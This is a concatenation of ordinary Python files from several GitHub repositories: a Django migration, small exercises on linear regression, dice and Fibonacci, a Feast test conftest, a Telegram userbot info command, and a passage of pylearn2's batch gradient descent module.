detected_licenses: [] | license_type: no_license | repo_name: AnkitaVikramShetty/airbnbNewUserPredictions
snapshot_id: 19e7a74bd39cc663c23e0a7c407d9a151a37a954 | revision_id: 86338384d565fcd017f18944559165ee806b751f | branch_name: refs/heads/master
visit_date: 2021-01-19T04:40:59.235835 | revision_date: 2017-05-02T16:14:55 | committer_date: 2017-05-02T16:14:55
github_id: 87385734 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 579 | extension: py
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('new_user', '0014_auto_20170428_1119'),
]
operations = [
migrations.AddField(
model_name='age_gender_bkts',
name='population_in_thousands',
field=models.FloatField(null=True),
),
migrations.AddField(
model_name='age_gender_bkts',
name='year',
field=models.FloatField(null=True),
),
]
authors: ["smaaz015@gmail.com"] | author_id: smaaz015@gmail.com

blob_id: 5893049dfab4f9e7702c5a3117f4468d5c72a98f | directory_id: 27bd7769798502bccbbc4b1bbc34e22d17f17d98
path: /regressao_linear.py | content_id: 6dd8db7e2851e9a8717ad91bfc2f4b32d1eb00d7
detected_licenses: [] | license_type: no_license | repo_name: jcclark/regressao_linear
snapshot_id: 03f3bfd759de3e629788d7ba6891f081ae41a667 | revision_id: bcf27dd810eb3916809b3683098ae2c3bd4dc619 | branch_name: refs/heads/master
visit_date: 2020-08-01T09:29:57.254610 | revision_date: 2019-10-05T22:35:14 | committer_date: 2019-10-05T22:35:14
github_id: 210948723 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 2757 | extension: py
import csv
import math
from random import randint
import matplotlib.pyplot as plt
def modelo( data, tipo, i):
dados = dv_dados(data, tipo)
b_treino, b_teste = dv_bases(dados, i)
b_0, b_1 = regressao_linear(b_treino, tipo)
    x = [d[0] for d in dados]
    y_real = [d[1] for d in dados]                 # observed averages
    y_pred = [b_0 + (d[0] * b_1) for d in dados]   # fitted line
    desvio = desvio_padrao(b_teste, b_0, b_1)
    print("Desvio padrão: " + str(round(desvio, 2)))
    plt.title('Média Provas x ' + tipo)
    plt.xlabel(tipo.title())
    plt.ylabel('Média provas')
    plt.scatter(x, y_real)
    plt.plot(x, y_pred)
plt.show()
def desvio_padrao(b_teste, b_0, b_1):
    # Root-mean-square deviation of the test set from the fitted line
    desvio = 0
    for d in b_teste:
        y = d[1]
        fx = b_0 + (d[0] * b_1)
        desvio += (y - fx) ** 2
    return math.sqrt(desvio / len(b_teste))
def regressao_linear(b_treino, tipo):  # 'tipo' is accepted but unused
N = len(b_treino)
x = somatorio(b_treino, 'x')
y = somatorio(b_treino, 'y')
xy = somatorio(b_treino, 'xy')
x1 = somatorio(b_treino, 'x2')
b_1 = ((x * y) - (N * xy)) / ((x ** 2) - (N * x1))
b_0 = (y - (b_1 * x))/ N
return b_0, b_1
def somatorio( l_n, tipo):
numeros = []
for t in l_n:
if tipo == 'x':
a = t[0]
elif tipo == 'y':
a = t[1]
elif tipo == 'xy':
a = t[0] * t[1]
elif tipo == 'x2':
a = t[0] ** 2
        else:
            raise ValueError('unknown tipo: ' + tipo)
numeros.append(a)
return sum(numeros)
def dv_dados( data, tipo):
res = []
for item in data:
if tipo == "Idade":
x = item.get("Idade")
elif tipo == "Tempo de Estudo":
x = item.get("Tempo de Estudo")
elif tipo == "Faltas":
x = item.get("Faltas")
y = item.get("MediaProvas")
res.append((int(x), int(y)))
return res
def dv_bases(dados, i):
p_treino = []
while (len(p_treino) < round(i * 0.7)):
posicao = randint(0, i - 1)
if posicao not in p_treino:
p_treino.append(posicao)
    d_treino = [dados[p] for p in p_treino]
    d_teste = [dados[p] for p in range(len(dados)) if p not in p_treino]
    return d_treino, d_teste
def executar():
data = []
with open("AnaliseEstudo.csv") as csv_file:
csv_reader = csv.reader(csv_file, delimiter=";")
for row in csv_reader:
if row[0] != "Idade":
media = (int(row[3]) + int(row[4]) + int(row[5])) / 3
aux = {
"Idade": row[0],
"Tempo de Estudo": row[1],
"Faltas":row[2],
"MediaProvas": media
}
data.append(aux)
for tipo in ["Idade", "Tempo de Estudo", "Faltas"]:
modelo(data, tipo, len(data))
executar()
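# Sanity check of the closed-form coefficients used in regressao_linear(),
# worked by hand for the points (1, 2), (2, 4), (3, 6):
#   N = 3, Σx = 6, Σy = 12, Σxy = 28, Σx² = 14
#   b_1 = (Σx·Σy − N·Σxy) / ((Σx)² − N·Σx²) = (72 − 84) / (36 − 42) = 2
#   b_0 = (Σy − b_1·Σx) / N = (12 − 12) / 3 = 0
# i.e. the fit recovers y = 2x exactly, as expected.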
authors: ["juniorclark@gmail.com"] | author_id: juniorclark@gmail.com

blob_id: 2ae5a8847cf48e47a874c90b02e69013112279ba | directory_id: f9faa75c7a0608f5a03fde26fb494de9bfdaa895
path: /WEEK 1/part01-e05_two_dice/src/two_dice.py | content_id: a650e13f6172340c085080170522dc497bc76781
detected_licenses: [] | license_type: no_license | repo_name: LeguizamonLuciano/DataAnalysisHelsinkiUni
snapshot_id: 16a8bead739b35a75f9d72c5691eedee70efc4eb | revision_id: 84af79815a5bcd497f731c4c24a22bb569db0c7f | branch_name: refs/heads/main
visit_date: 2023-01-15T20:18:01.487593 | revision_date: 2020-11-09T23:11:19 | committer_date: 2020-11-09T23:11:19
github_id: 307580394 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 183 | extension: py
#!/usr/bin/env python3
def main():
for i in range(1,7):
for j in range(1,7):
if i+j == 5:
print((i,j))
if __name__ == "__main__":
main()
authors: ["lucianoleguizamon@outlook.com"] | author_id: lucianoleguizamon@outlook.com

blob_id: 762b157f8689129dbb59a301f005e5c667ff34f1 | directory_id: 9fe97e356baf38e92a46553a5eb21d6f0942ec14
path: /cluster/sdk/tests/e2e/conftest.py | content_id: 534468ccc96285a9421e6e2bca799c442ed25e02
detected_licenses: ["LicenseRef-scancode-generic-cla", "MIT"] | license_type: permissive | repo_name: ezwiefel/feast-azure
snapshot_id: 1adbd9c3a12577c42164e7536d4afed6096a8e3c | revision_id: ae94e7232439559205d5e1e84217d8274e3d2f3b | branch_name: refs/heads/main
visit_date: 2023-08-27T00:43:26.233519 | revision_date: 2021-11-04T10:53:01 | committer_date: 2021-11-04T10:53:01
github_id: null | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 3696 | extension: py
import os
import pytest
def pytest_addoption(parser):
parser.addoption("--core-url", action="store", default="localhost:6565")
parser.addoption("--serving-url", action="store", default="localhost:6566")
parser.addoption("--job-service-url", action="store", default="localhost:6568")
parser.addoption("--kafka-brokers", action="store", default="localhost:9092")
parser.addoption(
"--env", action="store", help="local|aws|gcloud|k8s|synapse", default="local"
)
parser.addoption("--with-job-service", action="store_true")
parser.addoption("--staging-path", action="store")
parser.addoption("--dataproc-cluster-name", action="store")
parser.addoption("--dataproc-region", action="store")
parser.addoption("--emr-cluster-id", action="store")
parser.addoption("--emr-region", action="store")
parser.addoption("--dataproc-project", action="store")
parser.addoption("--dataproc-executor-instances", action="store", default="2")
parser.addoption("--dataproc-executor-cores", action="store", default="2")
parser.addoption("--dataproc-executor-memory", action="store", default="2g")
parser.addoption("--k8s-namespace", action="store", default="sparkop-e2e")
parser.addoption("--azure-synapse-dev-url", action="store", default="")
parser.addoption("--azure-synapse-pool-name", action="store", default="")
parser.addoption("--azure-synapse-datalake-dir", action="store", default="")
parser.addoption("--azure-blob-account-name", action="store", default="")
parser.addoption("--azure-blob-account-access-key", action="store", default="")
parser.addoption("--ingestion-jar", action="store")
parser.addoption("--redis-url", action="store", default="localhost:6379")
parser.addoption("--redis-cluster", action="store_true")
parser.addoption("--feast-version", action="store")
parser.addoption("--bq-project", action="store")
parser.addoption("--feast-project", action="store", default="default")
parser.addoption("--statsd-url", action="store", default="localhost:8125")
parser.addoption("--prometheus-url", action="store", default="localhost:9102")
parser.addoption("--enable-auth", action="store_true")
parser.addoption(
"--scheduled-streaming-job",
action="store_true",
help="When set tests won't manually start streaming jobs,"
" instead jobservice's loop is responsible for that",
)
def pytest_runtest_setup(item):
env_names = [mark.args[0] for mark in item.iter_markers(name="env")]
if env_names:
if item.config.getoption("env") not in env_names:
pytest.skip(f"test requires env in {env_names}")
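# Example of the marker this hook consumes (an illustrative test, not part
# of the suite):
#
#   @pytest.mark.env("k8s", "synapse")
#   def test_ingestion_on_cluster():
#       ...
#
# `pytest --env k8s` runs it; any other --env value makes it skip.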
from .fixtures.base import project_root, project_version # noqa
from .fixtures.client import ( # noqa
feast_client,
feast_spark_client,
global_staging_path,
ingestion_job_jar,
local_staging_path,
tfrecord_feast_client,
)
if not os.environ.get("DISABLE_SERVICE_FIXTURES"):
from .fixtures.services import ( # noqa
kafka_port,
kafka_server,
redis_server,
statsd_server,
zookeeper_server,
)
else:
from .fixtures.external_services import ( # type: ignore # noqa
kafka_server,
redis_server,
statsd_server,
)
if not os.environ.get("DISABLE_FEAST_SERVICE_FIXTURES"):
from .fixtures.feast_services import * # type: ignore # noqa
from .fixtures.services import postgres_server # noqa
else:
from .fixtures.external_services import ( # type: ignore # noqa
feast_core,
feast_serving,
feast_jobservice,
enable_auth,
)
from .fixtures.data import * # noqa
authors: ["47040993+rramani@users.noreply.github.com"] | author_id: 47040993+rramani@users.noreply.github.com

blob_id: fd6eff07502fb4045b9c9bea91c6e2e5360f0a6c | directory_id: dfac09701ae836ca8ff682ac741535eb84fec3af
path: /Dasha/modules/info.py | content_id: e291873d2b028cd6961d07b17aaaa10885835902
detected_licenses: [] | license_type: no_license | repo_name: Srinath2006/Dasha
snapshot_id: a166c2274e15e0b7a73a7216ae0a533843647f1d | revision_id: 54a2025c2cea0f89c322249578c271d132b90fd0 | branch_name: refs/heads/main
visit_date: 2023-08-23T02:23:26.245367 | revision_date: 2021-11-02T14:28:39 | committer_date: 2021-11-02T14:28:39
github_id: 423876040 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 2235 | extension: py
from Dasha import ubot
from Dasha.events import dasha
from . import get_user
from telethon.tl.functions.users import GetFullUserRequest
@dasha(pattern="^/info ?(.*)")
async def new(event):
if not event.reply_to_msg_id and not event.pattern_match.group(1):
user = await ubot.get_entity(event.sender_id)
else:
try:
user, extra = await get_user(event)
except TypeError as e:
print(e)
            return  # user could not be resolved; bail out instead of crashing below
user_id = user.id
first_name = user.first_name
last_name = user.last_name
username = user.username
text = "╒═══「<b>User info</b>:\n"
if first_name:
text += f"<b>First Name:</b> {first_name}\n"
if last_name:
text += f"<b>Last Name:</b> {last_name}\n"
ups = None
if username:
text += f"<b>Username:</b> @{username}\n"
ups = await event.client(GetFullUserRequest(user.username))
text += f"<b>ID:</b> <code>{user_id}</code>\n"
text += f'<b>User link:</b> <a href="tg://user?id={user_id}">{first_name}</a>'
if ups:
text += f"\n\n<b>Bio:</b> <code>{ups.about}</code>"
text += f"\n\n<b>Gbanned: No</b>"
text += f"\n\n╘══「 <b>Groups count:</b> {ups.common_chats_count} 」"
await event.edit(text, parse_mode='html')
@dasha(pattern="^/id ?(.*)")
async def _t(event):
if not event.reply_to_msg_id and not event.pattern_match.group(1):
user = await ubot.get_entity(event.sender_id)
else:
try:
user, extra = await get_user(event)
except TypeError as e:
print(e)
            return  # user could not be resolved; bail out instead of crashing below
user_id = user.id
chat_id = event.chat_id
msg_id = event.id
event_id = event.id
c_id = str(chat_id).replace('-100', '')
if event.reply_to_msg_id:
event_id = event.reply_to_msg_id
text = f"**[Chat ID]**(http://t.me/{event.chat.username}) : `{chat_id}`\n"
text += f"**[Message ID]**(http://t.me/c/{c_id}/{event_id}) : `{event_id}`\n"
text += f"**[User ID]**(tg://user?id={user_id}) : `{user_id}`"
if event.reply_to_msg_id:
msg = await event.get_reply_message()
        if msg.sticker:
            media_type = "Sticker"
        elif msg.audio:
            media_type = "Audio"
        elif msg.gif:
            media_type = "Gif"
        elif msg.video:
            media_type = "Video"
        elif msg.media:
            media_type = "Media"
        if msg.media:
            file_id = msg.file.id
            text += f"\n\n**Media Type:** `{media_type}`\n"
text += f"**Fid:** `{file_id}`"
await event.edit(text)
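# Illustrative chat usage (handled by the patterns above):
#
#   /info @username   -> edits the message with the user's profile details
#   /id               -> when replying to a message, shows chat/message/user
#                        IDs and, for media replies, the media type and file id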
authors: ["percy@railway.app"] | author_id: percy@railway.app

blob_id: ee8d4a24f7c6068b54efb883495622825593dcad | directory_id: 065694179b7a132d989c373573a0e89686cc2c8c
path: /untitled/venv/include/task1.py | content_id: 9fcae00b5f7e63cef0d7248881b10293e65e6e5b
detected_licenses: [] | license_type: no_license | repo_name: vksychev/PythonPlayground
snapshot_id: ff267b1173f43cae2d11634b70e75c0aa3f715aa | revision_id: 99c4c1471b4e3e5a528486a58bd92cfd42b33c0e | branch_name: refs/heads/master
visit_date: 2020-03-21T06:11:23.144147 | revision_date: 2018-12-27T14:56:07 | committer_date: 2018-12-27T14:56:07
github_id: 138204660 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 719 | extension: py
import math
def genA(n):
    # n samples of sin(i) for i in [0, n)
    return [math.sin(i) for i in range(n)]
def solution(A):
direction = 0
cur_direction = 0
count = 0
for i in range(len(A) - 1):
if A[i] < A[i + 1]:
cur_direction = 1
if direction != cur_direction:
direction = cur_direction
count += 1
elif A[i] > A[i + 1]:
cur_direction = -1
if direction != cur_direction:
direction = cur_direction
count += 1
return count + 1
def main():
A = [1, 2, 1, 2, 1, 2, 1, 2]
print(solution(A))
if __name__ == "__main__":
    main()
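# Worked example: solution() counts changes of direction along A and returns
# changes + 1. For A = [1, 2, 1, 2, 1, 2, 1, 2] every one of the 7 adjacent
# comparisons flips the direction (the first one initializes it), so
# count = 7 and main() prints 8.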
authors: ["vksychev@yandex.ru"] | author_id: vksychev@yandex.ru

blob_id: bec5d5fbb09b6260d514209bc438f344d215832b | directory_id: ac5e52a3fc52dde58d208746cddabef2e378119e
path: /exps-sblp/sblp_ut=3.5_rd=1_rw=0.04_rn=4_u=0.075-0.325_p=harmonic-2/sched=RUN_trial=30/sched.py | content_id: a85202e958d39e172c17afa700742b708255c6d6
detected_licenses: [] | license_type: no_license | repo_name: ricardobtxr/experiment-scripts
snapshot_id: 1e2abfcd94fb0ef5a56c5d7dffddfe814752eef1 | revision_id: 7bcebff7ac2f2822423f211f1162cd017a18babb | branch_name: refs/heads/master
visit_date: 2023-04-09T02:37:41.466794 | revision_date: 2021-04-25T03:27:16 | committer_date: 2021-04-25T03:27:16
github_id: 358926457 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 495 | extension: py
-S 0 -X RUN -Q 0 -L 2 84 250
-S 1 -X RUN -Q 0 -L 2 80 250
-S 0 -X RUN -Q 0 -L 2 74 250
-S 0 -X RUN -Q 0 -L 2 59 250
-S 2 -X RUN -Q 1 -L 1 57 200
-S 2 -X RUN -Q 1 -L 1 48 175
-S 2 -X RUN -Q 1 -L 1 40 125
-S 2 -X RUN -Q 1 -L 1 33 300
-S 3 -X RUN -Q 2 -L 1 29 100
-S 3 -X RUN -Q 2 -L 1 27 125
-S 3 -X RUN -Q 2 -L 1 21 100
-S 3 -X RUN -Q 2 -L 1 19 150
-S 4 -X RUN -Q 3 -L 1 19 100
-S 4 -X RUN -Q 3 -L 1 15 100
-S 4 -X RUN -Q 3 -L 1 14 100
authors: ["ricardo.btxr@gmail.com"] | author_id: ricardo.btxr@gmail.com

blob_id: 9dae9e1cb02e03ac83133c64c0010ed526601e15 | directory_id: bd9c74247381121f71f3dde6b55c67856f58e124
path: /编程题/第4章-6 输出前 n 个Fibonacci数 (15分).py | content_id: d9428ceda6a9128e079ff4764f63ec641e09169e
detected_licenses: [] | license_type: no_license | repo_name: Redomeliu/Python
snapshot_id: 302cd5abd89f7040911c8afb1db6faee6d43de64 | revision_id: 9f5568ec59d30ce0f7d572d072b86088e933abc8 | branch_name: refs/heads/master
visit_date: 2023-01-05T19:51:00.795864 | revision_date: 2020-10-29T02:42:36 | committer_date: 2020-10-29T02:42:36
github_id: 308293416 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 332 | extension: py
def Fibonacci(i):
    # Return the (i+1)-th Fibonacci number (0-indexed; sequence 1, 1, 2, 3, ...)
    lis = [1, 1]
    n = 1
    while i > n:
        lis.append(lis[n] + lis[n - 1])
        n += 1
    return lis[i]
x = int(input())
if x < 1:
    print('Invalid.')
else:
    count = 0
    for i in range(x):
        count += 1
        print(f'{Fibonacci(i):>11d}', end="")
        if count == 5 or i == x - 1:
            print()  # line break after every fifth number and after the last one
            count = 0
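# Illustrative run: an input of 7 prints the first seven Fibonacci numbers,
# right-aligned in 11-character fields, five per line:
#
#             1          1          2          3          5
#             8         13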
authors: ["1258995373@qq.com"] | author_id: 1258995373@qq.com

blob_id: da11437adf2aba52e01ffabe242c48711dbfe401 | directory_id: d0a54183ad20c3e1bfb3d70d118b3a2ccf9256be
path: /pylearn2/pylearn2/training_algorithms/bgd.py | content_id: 86cdd585642ea1c5ac01de3c8ab7785692360024
detected_licenses: ["BSD-3-Clause"] | license_type: permissive | repo_name: julius506/pylearn2
snapshot_id: 93973fafb80ccd724c9ec16d6f0dcab0544acbcb | revision_id: 9134a6438e954cf5d8a1684ef8f5e2767549d6bc | branch_name: refs/heads/master
visit_date: 2020-05-18T08:52:43.499030 | revision_date: 2014-12-03T05:26:25 | committer_date: 2014-12-03T05:26:25
github_id: null | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 20764 | extension: py
"""
Module for performing batch gradient methods.
Technically, SGD and BGD both work with any batch size, but SGD has no line
search functionality and is thus best suited to small batches, while BGD
supports line searches and thuse works best with large batches.
"""
__authors__ = "Ian Goodfellow"
__copyright__ = "Copyright 2010-2012, Universite de Montreal"
__credits__ = ["Ian Goodfellow"]
__license__ = "3-clause BSD"
__maintainer__ = "LISA Lab"
__email__ = "pylearn-dev@googlegroups"
import logging
import warnings
import numpy as np
from theano import config
from pylearn2.compat import OrderedDict
from pylearn2.monitor import Monitor
from pylearn2.optimization.batch_gradient_descent import BatchGradientDescent
from pylearn2.utils.iteration import is_stochastic
from pylearn2.training_algorithms.training_algorithm import TrainingAlgorithm
from pylearn2.utils import safe_zip
from pylearn2.train_extensions import TrainExtension
from pylearn2.termination_criteria import TerminationCriterion
from pylearn2.utils import sharedX
from pylearn2.space import CompositeSpace, NullSpace
from pylearn2.utils.data_specs import DataSpecsMapping
from pylearn2.utils.rng import make_np_rng
logger = logging.getLogger(__name__)
class BGD(TrainingAlgorithm):
"""
Batch Gradient Descent training algorithm class
Parameters
----------
cost : pylearn2.costs.Cost, optional
A pylearn2 Cost, or None, in which case model.get_default_cost()
will be used
batch_size : int, optional
Like the SGD TrainingAlgorithm, this TrainingAlgorithm still
iterates over minibatches of data. The difference is that this
class uses partial line searches to choose the step size along
each gradient direction, and can do repeated updates on the same
batch. The assumption is that you use big enough minibatches with
this algorithm that a large step size will generalize reasonably
well to other minibatches. To implement true Batch Gradient
Descent, set the batch_size to the total number of examples
available. If batch_size is None, it will revert to the model's
force_batch_size attribute.
batches_per_iter : int, optional
WRITEME
updates_per_batch : int, optional
Passed through to the optimization.BatchGradientDescent's
        `max_iters` parameter
monitoring_batch_size : int
Size of monitoring batches.
monitoring_batches : WRITEME
monitoring_dataset : Dataset or dict, optional
A Dataset or a dictionary mapping string dataset names to Datasets
termination_criterion : WRITEME
set_batch_size : bool, optional
If True, BGD will attempt to override the model's
`force_batch_size` attribute by calling set_batch_size on it.
reset_alpha : bool, optional
Passed through to the optimization.BatchGradientDescent's
`reset_alpha` parameter
conjugate : bool, optional
Passed through to the optimization.BatchGradientDescent's
`conjugate` parameter
min_init_alpha : float, optional
WRITEME
reset_conjugate : bool, optional
Passed through to the optimization.BatchGradientDescent's
`reset_conjugate` parameter
line_search_mode : WRITEME
verbose_optimization : bool, optional
WRITEME
scale_step : float, optional
WRITEME
theano_function_mode : WRITEME
init_alpha : WRITEME
seed : WRITEME
"""
def __init__(self, cost=None, batch_size=None, batches_per_iter=None,
updates_per_batch=10, monitoring_batch_size=None,
monitoring_batches=None, monitoring_dataset=None,
termination_criterion=None, set_batch_size=False,
reset_alpha=True, conjugate=False, min_init_alpha=.001,
reset_conjugate=True, line_search_mode=None,
verbose_optimization=False, scale_step=1.,
theano_function_mode=None, init_alpha=None, seed=None):
self.__dict__.update(locals())
del self.self
if monitoring_dataset is None:
assert monitoring_batches is None
assert monitoring_batch_size is None
self._set_monitoring_dataset(monitoring_dataset)
self.bSetup = False
self.termination_criterion = termination_criterion
self.rng = make_np_rng(seed, [2012, 10, 16],
which_method=["randn", "randint"])
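    # Illustrative construction (a sketch, not from the library docs;
    # `valid_set` is a placeholder dataset):
    #
    # >>> from pylearn2.termination_criteria import EpochCounter
    # >>> algorithm = BGD(batch_size=5000, updates_per_batch=10,
    # ...                 conjugate=True,
    # ...                 monitoring_dataset={'valid': valid_set},
    # ...                 termination_criterion=EpochCounter(100))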
def setup(self, model, dataset):
"""
Allows the training algorithm to do some preliminary configuration
*before* we actually start training the model. The dataset is provided
        in case other derived training algorithms need to modify the model based on
the dataset.
Parameters
----------
model : object
A Python object representing the model to train. Loosely
implementing the interface of models.model.Model.
dataset : pylearn2.datasets.dataset.Dataset
Dataset object used to draw training data
"""
self.model = model
if self.cost is None:
self.cost = model.get_default_cost()
try:
if self.cost.is_stochastic():
raise TypeError("BGD is not compatible with stochastic "
"costs.")
except NotImplementedError:
warnings.warn("BGD is not compatible with stochastic costs "
"and cannot determine whether the current cost is "
"stochastic.")
if self.batch_size is None:
self.batch_size = model.force_batch_size
else:
batch_size = self.batch_size
if self.set_batch_size:
model.set_batch_size(batch_size)
elif hasattr(model, 'force_batch_size'):
if not (model.force_batch_size <= 0 or batch_size ==
model.force_batch_size):
                raise ValueError(("batch_size is %d but "
                                  "model.force_batch_size is %d") %
                                 (batch_size, model.force_batch_size))
self.monitor = Monitor.get_monitor(model)
self.monitor.set_theano_function_mode(self.theano_function_mode)
data_specs = self.cost.get_data_specs(model)
mapping = DataSpecsMapping(data_specs)
space_tuple = mapping.flatten(data_specs[0], return_tuple=True)
source_tuple = mapping.flatten(data_specs[1], return_tuple=True)
# Build a flat tuple of Theano Variables, one for each space,
# named according to the sources.
theano_args = []
for space, source in safe_zip(space_tuple, source_tuple):
name = 'BGD_[%s]' % source
arg = space.make_theano_batch(name=name)
theano_args.append(arg)
theano_args = tuple(theano_args)
# Methods of `self.cost` need args to be passed in a format compatible
# with their data_specs
nested_args = mapping.nest(theano_args)
fixed_var_descr = self.cost.get_fixed_var_descr(model, nested_args)
self.on_load_batch = fixed_var_descr.on_load_batch
cost_value = self.cost.expr(model, nested_args,
** fixed_var_descr.fixed_vars)
grads, grad_updates = self.cost.get_gradients(
model, nested_args, ** fixed_var_descr.fixed_vars)
assert isinstance(grads, OrderedDict)
assert isinstance(grad_updates, OrderedDict)
if cost_value is None:
raise ValueError("BGD is incompatible with " + str(self.cost) +
" because it is intractable, but BGD uses the " +
"cost function value to do line searches.")
# obj_prereqs has to be a list of function f called with f(*data),
# where data is a data tuple coming from the iterator.
# this function enables capturing "mapping" and "f", while
# enabling the "*data" syntax
def capture(f, mapping=mapping):
new_f = lambda *args: f(mapping.flatten(args, return_tuple=True))
return new_f
obj_prereqs = [capture(f) for f in fixed_var_descr.on_load_batch]
if self.monitoring_dataset is not None:
if (self.monitoring_batch_size is None and
self.monitoring_batches is None):
self.monitoring_batch_size = self.batch_size
self.monitoring_batches = self.batches_per_iter
self.monitor.setup(
dataset=self.monitoring_dataset,
cost=self.cost,
batch_size=self.monitoring_batch_size,
num_batches=self.monitoring_batches,
obj_prereqs=obj_prereqs,
cost_monitoring_args=fixed_var_descr.fixed_vars)
params = model.get_params()
self.optimizer = BatchGradientDescent(
objective=cost_value,
gradients=grads,
gradient_updates=grad_updates,
params=params,
param_constrainers=[model.modify_updates],
lr_scalers=model.get_lr_scalers(),
inputs=theano_args,
verbose=self.verbose_optimization,
max_iter=self.updates_per_batch,
reset_alpha=self.reset_alpha,
conjugate=self.conjugate,
reset_conjugate=self.reset_conjugate,
min_init_alpha=self.min_init_alpha,
line_search_mode=self.line_search_mode,
theano_function_mode=self.theano_function_mode,
init_alpha=self.init_alpha)
# These monitoring channels keep track of shared variables,
# which do not need inputs nor data.
if self.monitoring_dataset is not None:
self.monitor.add_channel(
name='ave_step_size',
ipt=None,
val=self.optimizer.ave_step_size,
data_specs=(NullSpace(), ''),
dataset=self.monitoring_dataset.values()[0])
self.monitor.add_channel(
name='ave_grad_size',
ipt=None,
val=self.optimizer.ave_grad_size,
data_specs=(NullSpace(), ''),
dataset=self.monitoring_dataset.values()[0])
self.monitor.add_channel(
name='ave_grad_mult',
ipt=None,
val=self.optimizer.ave_grad_mult,
data_specs=(NullSpace(), ''),
dataset=self.monitoring_dataset.values()[0])
self.first = True
self.bSetup = True
def train(self, dataset):
"""
.. todo::
WRITEME
"""
assert self.bSetup
model = self.model
rng = self.rng
train_iteration_mode = 'shuffled_sequential'
if not is_stochastic(train_iteration_mode):
rng = None
data_specs = self.cost.get_data_specs(self.model)
# The iterator should be built from flat data specs, so it returns
        # flat, non-redundant tuples of data.
mapping = DataSpecsMapping(data_specs)
space_tuple = mapping.flatten(data_specs[0], return_tuple=True)
source_tuple = mapping.flatten(data_specs[1], return_tuple=True)
if len(space_tuple) == 0:
# No data will be returned by the iterator, and it is impossible
# to know the size of the actual batch.
# It is not decided yet what the right thing to do should be.
raise NotImplementedError("Unable to train with BGD, because "
"the cost does not actually use data "
"from the data set. "
"data_specs: %s" % str(data_specs))
flat_data_specs = (CompositeSpace(space_tuple), source_tuple)
iterator = dataset.iterator(mode=train_iteration_mode,
batch_size=self.batch_size,
num_batches=self.batches_per_iter,
data_specs=flat_data_specs,
return_tuple=True,
rng=rng)
mode = self.theano_function_mode
for data in iterator:
if ('targets' in source_tuple and mode is not None
and hasattr(mode, 'record')):
Y = data[source_tuple.index('targets')]
stry = str(Y).replace('\n', ' ')
mode.record.handle_line('data Y ' + stry + '\n')
for on_load_batch in self.on_load_batch:
on_load_batch(mapping.nest(data))
self.before_step(model)
self.optimizer.minimize(*data)
self.after_step(model)
actual_batch_size = flat_data_specs[0].np_batch_size(data)
model.monitor.report_batch(actual_batch_size)
def continue_learning(self, model):
"""
.. todo::
WRITEME
"""
if self.termination_criterion is None:
return True
else:
rval = self.termination_criterion.continue_learning(self.model)
assert rval in [True, False, 0, 1]
return rval
def before_step(self, model):
"""
.. todo::
WRITEME
"""
if self.scale_step != 1.:
self.params = list(model.get_params())
self.value = [param.get_value() for param in self.params]
def after_step(self, model):
"""
.. todo::
WRITEME
"""
if self.scale_step != 1:
for param, value in safe_zip(self.params, self.value):
value = (1. - self.scale_step) * value + self.scale_step \
* param.get_value()
param.set_value(value)
class StepShrinker(TrainExtension, TerminationCriterion):
"""
.. todo::
WRITEME
"""
def __init__(self, channel, scale, giveup_after, scale_up=1.,
max_scale=1.):
self.__dict__.update(locals())
del self.self
self.continue_learning = True
self.first = True
self.prev = np.inf
def on_monitor(self, model, dataset, algorithm):
"""
.. todo::
WRITEME
"""
monitor = model.monitor
if self.first:
self.first = False
self.monitor_channel = sharedX(algorithm.scale_step)
# TODO: make monitor accept channels not associated with any
# dataset,
# so this hack won't be necessary
hack = monitor.channels.values()[0]
monitor.add_channel('scale_step', hack.graph_input,
self.monitor_channel, dataset=hack.dataset,
data_specs=hack.data_specs)
channel = monitor.channels[self.channel]
v = channel.val_record
if len(v) == 1:
return
latest = v[-1]
logger.info("Latest {0}: {1}".format(self.channel, latest))
# Only compare to the previous step, not the best step so far
# Another extension can be in charge of saving the best parameters ever
        # seen. We want to keep learning as long as we're making progress. We
# don't want to give up on a step size just because it failed to undo
# the damage of the bigger one that preceded it in a single epoch
logger.info("Previous is {0}".format(self.prev))
cur = algorithm.scale_step
if latest >= self.prev:
logger.info("Looks like using {0} "
"isn't working out so great for us.".format(cur))
cur *= self.scale
if cur < self.giveup_after:
logger.info("Guess we just have to give up.")
self.continue_learning = False
cur = self.giveup_after
logger.info("Let's see how {0} does.".format(cur))
elif latest <= self.prev and self.scale_up != 1.:
logger.info("Looks like we're making progress "
"on the validation set, let's try speeding up")
cur *= self.scale_up
if cur > self.max_scale:
cur = self.max_scale
logger.info("New scale is {0}".format(cur))
algorithm.scale_step = cur
self.monitor_channel.set_value(np.cast[config.floatX](cur))
self.prev = latest
def __call__(self, model):
"""
.. todo::
WRITEME
"""
return self.continue_learning
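# Illustrative wiring (a sketch; the channel name and factors are
# placeholders). The same StepShrinker object acts both as a train extension
# and as the algorithm's termination criterion:
#
# >>> from pylearn2.train import Train
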